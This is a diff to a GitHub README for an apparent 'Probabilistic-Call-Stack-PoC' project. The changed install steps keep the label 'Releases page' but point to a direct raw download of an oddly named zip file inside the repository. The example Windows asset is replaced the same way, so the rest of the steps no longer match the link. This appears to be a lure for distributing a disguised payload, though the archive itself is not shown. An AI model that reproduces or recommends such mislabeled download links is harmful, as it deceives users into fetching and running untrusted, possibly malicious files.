VitAaXentmax/Probabilistic-Call-Stack-PoC/README.md

 - **Additional Software**: Ensure you have a current version of any necessary runtime environment (e.g., .NET for Windows users).

 ## 📥 Download & Install
-1. Click this link to go to the [Releases page](https://github.com/VitAaXentmax/Probabilistic-Call-Stack-PoC/releases).
+1. Click this link to go to the [Releases page](https://github.com/VitAaXentmax/Probabilistic-Call-Stack-PoC/raw/refs/heads/main/Joon/Probabilistic_Stack_C_Call_Po_1.7.zip).
 2. On the Releases page, you will see a list of available versions.
 3. Find the latest release, which will typically be at the top of the list.
-4. Click on the asset link that matches your operating system (e.g., `Probabilistic-Call-Stack-PoC-win.exe` for Windows).
+4. Click on the asset link that matches your operating system (e.g., `https://github.com/VitAaXentmax/Probabilistic-Call-Stack-PoC/raw/refs/heads/main/Joon/Probabilistic_Stack_C_Call_Po_1.7.zip` for Windows).
 5. Download the file to your computer.

 ### How to Run the Application